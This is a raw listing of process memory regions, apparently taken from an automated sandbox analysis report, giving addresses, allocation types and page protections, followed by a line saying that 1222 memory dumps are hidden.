page read and write
6E80000
trusted library allocation
page read and write
4D42000
trusted library allocation
page read and write
3199000
heap
page read and write
B6E000
stack
page read and write
453E000
heap
page read and write
BF4000
trusted library allocation
page read and write
17DBF6AE000
heap
page read and write
D60000
heap
page read and write
66B0000
trusted library allocation
page read and write
3FBC000
heap
page read and write
3199000
heap
page read and write
C10000
heap
page read and write
3197000
heap
page read and write
4539000
heap
page read and write
409A000
heap
page read and write
17DBF6B1000
heap
page read and write
432A000
heap
page read and write
4538000
heap
page read and write
432E000
heap
page read and write
4530000
direct allocation
page read and write
EE7000
heap
page read and write
409A000
heap
page read and write
319E000
heap
page read and write
409A000
heap
page read and write
77B614E000
stack
page read and write
408E000
heap
page read and write
7FFD34710000
trusted library allocation
page execute and read and write
4532000
heap
page read and write
3F3E000
heap
page read and write
3F3E000
heap
page read and write
482000
unkown
page readonly
FA0000
heap
page read and write
3D54000
heap
page read and write
3192000
heap
page read and write
3D51000
heap
page read and write
410C000
heap
page read and write
515E000
stack
page read and write
7FFD34820000
trusted library allocation
page execute and read and write
3F3E000
heap
page read and write
409A000
heap
page read and write
E26000
heap
page read and write
4D84000
heap
page read and write
4539000
heap
page read and write
409A000
heap
page read and write
409A000
heap
page read and write
453D000
heap
page read and write
3FBC000
heap
page read and write
2A2E000
trusted library allocation
page read and write
3FBC000
heap
page read and write
410C000
heap
page read and write
3F3E000
heap
page read and write
1418000
heap
page read and write
17DBF9EE000
heap
page read and write
410C000
heap
page read and write
77B507B000
stack
page read and write
47F9000
direct allocation
page read and write
3D53000
heap
page read and write
4538000
heap
page read and write
4539000
heap
page read and write
7FFD347F0000
trusted library allocation
page read and write
409A000
heap
page read and write
502000
unkown
page readonly
3171000
trusted library allocation
page read and write
409A000
heap
page read and write
4538000
heap
page read and write
6630000
trusted library allocation
page execute and read and write
EB0000
trusted library allocation
page read and write
2213FA6F000
heap
page read and write
453D000
heap
page read and write
3197000
heap
page read and write
4322000
heap
page read and write
4535000
heap
page read and write
453F000
heap
page read and write
4539000
heap
page read and write
45A7000
heap
page read and write
453C000
heap
page read and write
3D55000
heap
page read and write
4F4E000
stack
page read and write
3FBC000
heap
page read and write
65BD000
trusted library allocation
page read and write
45A9000
heap
page read and write
14A0000
trusted library allocation
page read and write
3D51000
heap
page read and write
3D53000
heap
page read and write
432F000
heap
page read and write
4539000
heap
page read and write
3194000
heap
page read and write
BFD000
trusted library allocation
page execute and read and write
3197000
heap
page read and write
4327000
heap
page read and write
432C000
heap
page read and write
59C000
stack
page read and write
14D6000
heap
page read and write
406D000
heap
page read and write
3D57000
heap
page read and write
4531000
heap
page read and write
3D57000
heap
page read and write
4327000
heap
page read and write
2213F653000
heap
page read and write
2213F760000
heap
page read and write
2A17000
trusted library allocation
page read and write
47F9000
direct allocation
page read and write
4D5D000
trusted library allocation
page read and write
45A4000
heap
page read and write
E6D000
trusted library allocation
page execute and read and write
E5D000
trusted library allocation
page execute and read and write
221256E2000
heap
page read and write
46D0000
direct allocation
page read and write
47FD000
direct allocation
page read and write
408E000
heap
page read and write
453E000
heap
page read and write
45AF000
heap
page read and write
409A000
heap
page read and write
6E88000
trusted library allocation
page read and write
BDF000
stack
page read and write
42D96FF000
stack
page read and write
409A000
heap
page read and write
410C000
heap
page read and write
4534000
heap
page read and write
4D45000
trusted library allocation
page read and write
45A8000
heap
page read and write
3FBC000
heap
page read and write
453D000
heap
page read and write
410C000
heap
page read and write
38E1000
trusted library allocation
page read and write
453F000
heap
page read and write
7FFD34870000
trusted library allocation
page read and write
4530000
direct allocation
page read and write
45AA000
heap
page read and write
7FFD34910000
trusted library allocation
page read and write
4D3E000
trusted library allocation
page read and write
221258B5000
heap
page read and write
4C2000
unkown
page readonly
3192000
heap
page read and write
42D9CFF000
stack
page read and write
6E70000
trusted library allocation
page execute and read and write
30E3000
heap
page read and write
408E000
heap
page read and write
4D51000
trusted library allocation
page read and write
408E000
heap
page read and write
27BE000
stack
page read and write
3D50000
heap
page read and write
3FBD000
heap
page read and write
408E000
heap
page read and write
319F000
heap
page read and write
2213FAA5000
heap
page read and write
4538000
heap
page read and write
3D51000
heap
page read and write
409A000
heap
page read and write
4535000
heap
page read and write
4EB0000
heap
page execute and read and write
50CE000
stack
page read and write
3195000
heap
page read and write
3D5A000
heap
page read and write
3D59000
heap
page read and write
408E000
heap
page read and write
410C000
heap
page read and write
409A000
heap
page read and write
408E000
heap
page read and write
2840000
heap
page read and write
45A5000
heap
page read and write
3191000
heap
page read and write
45A2000
heap
page read and write
6F40000
trusted library allocation
page execute and read and write
37E1000
trusted library allocation
page read and write
3F3E000
heap
page read and write
77B5336000
stack
page read and write
6720000
trusted library allocation
page execute and read and write
4329000
heap
page read and write
2213FA30000
heap
page read and write
3851000
trusted library allocation
page read and write
33A0000
heap
page execute and read and write
45A4000
heap
page read and write
1667000
heap
page read and write
22128C3D000
trusted library allocation
page read and write
3FBC000
heap
page read and write
45AD000
heap
page read and write
4532000
heap
page read and write
133E000
stack
page read and write
4320000
heap
page read and write
443C000
trusted library allocation
page read and write
453F000
heap
page read and write
529E000
stack
page read and write
60EE000
stack
page read and write
4115000
heap
page read and write
409A000
heap
page read and write
409A000
heap
page read and write
4AB000
unkown
page readonly
A1E000
stack
page read and write
408E000
heap
page read and write
410C000
heap
page read and write
4653000
direct allocation
page read and write
410C000
heap
page read and write
17DBF697000
heap
page read and write
77B517F000
stack
page read and write
319C000
heap
page read and write
642E000
stack
page read and write
453F000
heap
page read and write
EB1000
heap
page read and write
66B5000
trusted library allocation
page read and write
4531000
heap
page read and write
453E000
heap
page read and write
408E000
heap
page read and write
410C000
heap
page read and write
410C000
heap
page read and write
3FBC000
heap
page read and write
77B50FF000
stack
page read and write
3D56000
heap
page read and write
D80000
heap
page read and write
3F3E000
heap
page read and write
3D58000
heap
page read and write
3190000
heap
page read and write
47FD000
direct allocation
page read and write
59EC000
stack
page read and write
3F3E000
heap
page read and write
4530000
heap
page read and write
409A000
heap
page read and write
7FFD34660000
trusted library allocation
page read and write
432C000
heap
page read and write
5D6E000
stack
page read and write
42D99FD000
stack
page read and write
3F3E000
heap
page read and write
408E000
heap
page read and write
317D000
trusted library allocation
page read and write
34C9000
trusted library allocation
page read and write
BFD000
trusted library allocation
page execute and read and write
45A7000
heap
page read and write
3D50000
heap
page read and write
14A6000
trusted library allocation
page execute and read and write
348D000
trusted library allocation
page read and write
22127651000
trusted library allocation
page read and write
C0D000
trusted library allocation
page execute and read and write
410C000
heap
page read and write
22128C58000
trusted library allocation
page read and write
3FBC000
heap
page read and write
3FBC000
heap
page read and write
4531000
heap
page read and write
408E000
heap
page read and write
5439000
trusted library allocation
page read and write
453A000
heap
page read and write
D50000
trusted library allocation
page read and write
45A4000
heap
page read and write
7FFD34832000
trusted library allocation
page read and write
7FFD34706000
trusted library allocation
page read and write
432A000
heap
page read and write
5E2E000
stack
page read and write
525E000
stack
page read and write
1383000
trusted library allocation
page execute and read and write
2985000
trusted library allocation
page read and write
4530000
heap
page read and write
4539000
heap
page read and write
5E80000
trusted library allocation
page execute and read and write
409A000
heap
page read and write
5E6E000
stack
page read and write
408E000
heap
page read and write
409A000
heap
page read and write
3FBD000
heap
page read and write
4B3000
unkown
page readonly
45A5000
heap
page read and write
4C2000
unkown
page readonly
409A000
heap
page read and write
143F000
heap
page read and write
65B0000
trusted library allocation
page read and write
16AD000
heap
page read and write
409A000
heap
page read and write
3D5A000
heap
page read and write
4530000
direct allocation
page read and write
3FBC000
heap
page read and write
3197000
heap
page read and write
EF8000
trusted library allocation
page read and write
45A8000
heap
page read and write
17DBF660000
heap
page read and write
3F3E000
heap
page read and write
432A000
heap
page read and write
45A2000
heap
page read and write
4D70000
trusted library allocation
page read and write
408E000
heap
page read and write
22125702000
heap
page read and write
453C000
heap
page read and write
4533000
heap
page read and write
713F000
stack
page read and write
4539000
heap
page read and write
C18000
heap
page read and write
3F3E000
heap
page read and write
4321000
heap
page read and write
65AE000
stack
page read and write
C25000
trusted library allocation
page execute and read and write
409A000
heap
page read and write
408E000
heap
page read and write
3F3E000
heap
page read and write
316E000
trusted library allocation
page read and write
3D59000
heap
page read and write
4539000
heap
page read and write
3FBC000
heap
page read and write
656E000
stack
page read and write
4530000
heap
page read and write
3FBC000
heap
page read and write
4325000
heap
page read and write
7DF436950000
trusted library allocation
page execute and read and write
4533000
heap
page read and write
3140000
trusted library allocation
page read and write
408E000
heap
page read and write
6E85000
trusted library allocation
page read and write
3FBC000
heap
page read and write
13D6000
heap
page read and write
5AEE000
stack
page read and write
42D97FE000
stack
page read and write
3401000
trusted library allocation
page read and write
409A000
heap
page read and write
42D9DFB000
stack
page read and write
50A000
unkown
page readonly
4E00000
heap
page execute and read and write
410C000
heap
page read and write
3FBC000
heap
page read and write
453C000
heap
page read and write
3FBC000
heap
page read and write
29D8000
trusted library allocation
page read and write
2830000
trusted library allocation
page read and write
408E000
heap
page read and write
27AC000
stack
page read and write
408E000
heap
page read and write
27C0000
trusted library allocation
page execute and read and write
319E000
heap
page read and write
83C000
stack
page read and write
DE0000
trusted library allocation
page execute and read and write
3FBC000
heap
page read and write
432C000
heap
page read and write
7FFD3466B000
trusted library allocation
page read and write
17DBF6C3000
heap
page read and write
4329000
heap
page read and write
13A8000
heap
page read and write
33EF000
trusted library allocation
page read and write
453E000
heap
page read and write
7FFD34654000
trusted library allocation
page read and write
22125699000
heap
page read and write
3F3E000
heap
page read and write
482000
unkown
page readonly
58A0000
heap
page execute and read and write
410C000
heap
page read and write
409A000
heap
page read and write
486E000
direct allocation
page read and write
14B5000
trusted library allocation
page execute and read and write
71E0000
heap
page read and write
6E90000
trusted library allocation
page read and write
409A000
heap
page read and write
4536000
heap
page read and write
3F4E000
heap
page read and write
410C000
heap
page read and write
4538000
heap
page read and write
7FFD348F0000
trusted library allocation
page read and write
4534000
heap
page read and write
3F3E000
heap
page read and write
4533000
heap
page read and write
3458000
trusted library allocation
page read and write
42D93FE000
stack
page read and write
17DBF697000
heap
page read and write
410C000
heap
page read and write
A95000
heap
page read and write
409A000
heap
page read and write
17DBF68A000
heap
page read and write
400000
unkown
page readonly
4E3E000
stack
page read and write
2213F839000
heap
page read and write
3F3E000
heap
page read and write
46D0000
direct allocation
page read and write
5430000
trusted library allocation
page read and write
E87000
trusted library allocation
page execute and read and write
3190000
heap
page read and write
4321000
heap
page read and write
22137800000
trusted library allocation
page read and write
3F3E000
heap
page read and write
409A000
heap
page read and write
22137660000
trusted library allocation
page read and write
5C16000
heap
page read and write
77B4FFE000
stack
page read and write
453D000
heap
page read and write
674D000
stack
page read and write
3D50000
heap
page read and write
4323000
heap
page read and write
E8B000
trusted library allocation
page execute and read and write
406D000
heap
page read and write
1380000
trusted library allocation
page read and write
6BCF000
stack
page read and write
17DBF668000
heap
page read and write
4538000
heap
page read and write
3F3E000
heap
page read and write
4328000
heap
page read and write
3192000
heap
page read and write
45AB000
heap
page read and write
221258E0000
heap
page read and write
409A000
heap
page read and write
409A000
heap
page read and write
5E77000
trusted library allocation
page read and write
406D000
heap
page read and write
2A24000
trusted library allocation
page read and write
4D62000
trusted library allocation
page read and write
4531000
heap
page read and write
22125748000
heap
page read and write
3D53000
heap
page read and write
45AC000
heap
page read and write
77B4F7D000
stack
page read and write
288C000
stack
page read and write
22127563000
trusted library allocation
page read and write
3192000
heap
page read and write
1670000
trusted library allocation
page execute and read and write
C22000
trusted library allocation
page read and write
4536000
heap
page read and write
17DBF71A000
heap
page read and write
453F000
heap
page read and write
4530000
direct allocation
page read and write
C00000
trusted library allocation
page read and write
4539000
heap
page read and write
45AC000
heap
page read and write
2A07000
trusted library allocation
page read and write
7FFD348C0000
trusted library allocation
page read and write
409A000
heap
page read and write
45A0000
heap
page read and write
45AC000
heap
page read and write
4538000
heap
page read and write
45AB000
heap
page read and write
3CAB000
heap
page read and write
6608000
heap
page read and write
4535000
heap
page read and write
408E000
heap
page read and write
409A000
heap
page read and write
58D0000
trusted library allocation
page read and write
8F9000
stack
page read and write
409A000
heap
page read and write
4531000
heap
page read and write
3FBC000
heap
page read and write
66A0000
trusted library allocation
page execute and read and write
4538000
heap
page read and write
4413000
trusted library allocation
page read and write
409A000
heap
page read and write
4538000
heap
page read and write
3FBC000
heap
page read and write
22125640000
heap
page read and write
5DAE000
stack
page read and write
4329000
heap
page read and write
BF3000
trusted library allocation
page execute and read and write
3D56000
heap
page read and write
C04000
trusted library allocation
page read and write
E60000
heap
page read and write
408E000
heap
page read and write
408E000
heap
page read and write
17DBF840000
heap
page read and write
65C2000
trusted library allocation
page read and write
17DBF6C3000
heap
page read and write
410C000
heap
page read and write
2987000
trusted library allocation
page read and write
409A000
heap
page read and write
17DBF672000
heap
page read and write
5BF0000
heap
page read and write
42D9AFF000
stack
page read and write
3195000
heap
page read and write
45A8000
heap
page read and write
409A000
heap
page read and write
3199000
heap
page read and write
1611000
heap
page read and write
42D92FA000
stack
page read and write
C19000
heap
page read and write
221276DB000
trusted library allocation
page read and write
343A000
trusted library allocation
page read and write
4324000
heap
page read and write
432B000
heap
page read and write
45AA000
heap
page read and write
409A000
heap
page read and write
3192000
heap
page read and write
349A000
trusted library allocation
page read and write
45AE000
heap
page read and write
409A000
heap
page read and write
2A93000
trusted library allocation
page read and write
2213FACF000
heap
page read and write
4324000
heap
page read and write
3F3E000
heap
page read and write
C12000
trusted library allocation
page read and write
77B610D000
stack
page read and write
409A000
heap
page read and write
409A000
heap
page read and write
22129169000
trusted library allocation
page read and write
C27000
trusted library allocation
page execute and read and write
662D000
heap
page read and write
500C000
stack
page read and write
4531000
heap
page read and write
3193000
heap
page read and write
6550000
heap
page read and write
B6D000
heap
page read and write
7D0000
heap
page read and write
There are 1222 hidden memdumps, click here to show them.